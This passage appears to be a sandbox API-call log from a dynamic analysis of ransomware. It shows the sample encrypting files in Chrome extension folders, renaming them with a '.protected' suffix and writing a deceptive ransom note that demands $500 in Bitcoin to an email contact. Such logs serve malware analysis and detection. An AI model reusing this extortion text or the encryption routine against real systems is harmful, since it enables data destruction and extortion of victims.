[0080.459] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.459] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.459] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.459] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.459] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.460] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.460] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.460] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.460] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json") 
returned 155 [0080.460] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.460] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.460] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.460] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.460] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.460] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json") returned 155 [0080.460] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.460] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json") returned 155 [0080.460] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.460] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json") returned 155 [0080.460] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.461] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x98, lpOverlapped=0x0) returned 1 [0080.461] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff68, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.461] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x98, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x98, lpOverlapped=0x0) returned 1 [0080.462] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.462] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.462] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.462] CloseHandle (hObject=0x168) returned 1 [0080.462] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json.protected") returned 165 [0080.462] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json.protected")) returned 1 [0080.463] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.463] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.463] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\RESTORE_FILES.txt") returned 159 [0080.463] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.464] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.464] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.464] lstrlenA (lpString="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") returned 684 [0080.464] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.465] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.465] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.465] CloseHandle (hObject=0x164) returned 1 [0080.465] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.465] lstrcmpiW (lpString1="fa", lpString2="Windows") returned -1 [0080.465] lstrcmpiW (lpString1="fa", lpString2="Program Files") returned -1 [0080.465] lstrcmpiW (lpString1="fa", lpString2="Program Files (x86)") returned -1 [0080.465] lstrcmpiW (lpString1="fa", lpString2="$Recycle.bin") returned 1 [0080.465] lstrcmpiW (lpString1="fa", lpString2="System Volume Information") returned -1 [0080.465] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa") returned 141 [0080.465] lstrcmpW (lpString1="fa", lpString2=".") returned 1 [0080.465] lstrcmpW (lpString1="fa", lpString2="..") returned 1 [0080.465] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\*") returned 143 [0080.465] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.465] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.465] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.465] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.465] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.466] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.466] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\.") returned 143 [0080.466] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.466] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.466] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.466] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.466] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.466] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.466] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.466] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\..") returned 144 [0080.466] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.466] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.466] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.466] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.466] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.466] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.466] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.466] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.466] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json") 
returned 155 [0080.466] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.466] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.466] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.466] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.466] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.467] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json") returned 155 [0080.467] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.467] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json") returned 155 [0080.467] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.467] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json") returned 155 [0080.467] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.467] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xff, lpOverlapped=0x0) returned 1 [0080.468] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff01, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.468] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xff, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xff, lpOverlapped=0x0) returned 1 [0080.468] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.468] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.468] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.468] CloseHandle (hObject=0x168) returned 1 [0080.468] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json.protected") returned 165 [0080.468] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json.protected")) returned 1 [0080.469] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.469] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.469] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\RESTORE_FILES.txt") returned 159 [0080.469] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.470] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.470] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.471] lstrlenA (lpString="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") returned 684 [0080.471] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.471] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.471] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.471] CloseHandle (hObject=0x164) returned 1 [0080.471] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.471] lstrcmpiW (lpString1="fi", lpString2="Windows") returned -1 [0080.471] lstrcmpiW (lpString1="fi", lpString2="Program Files") returned -1 [0080.471] lstrcmpiW (lpString1="fi", lpString2="Program Files (x86)") returned -1 [0080.471] lstrcmpiW (lpString1="fi", lpString2="$Recycle.bin") returned 1 [0080.471] lstrcmpiW (lpString1="fi", lpString2="System Volume Information") returned -1 [0080.471] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi") returned 141 [0080.471] lstrcmpW (lpString1="fi", lpString2=".") returned 1 [0080.471] lstrcmpW (lpString1="fi", lpString2="..") returned 1 [0080.471] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\*") returned 143 [0080.471] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.472] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.472] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.472] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.472] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.472] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.472] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\.") returned 143 [0080.472] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.472] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.472] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.472] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.472] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.472] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.472] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.472] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\..") returned 144 [0080.472] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.472] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.473] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.473] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.473] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.473] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.473] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.473] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.473] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json") 
returned 155 [0080.473] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.473] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.473] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.473] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.473] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.473] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json") returned 155 [0080.473] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.473] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 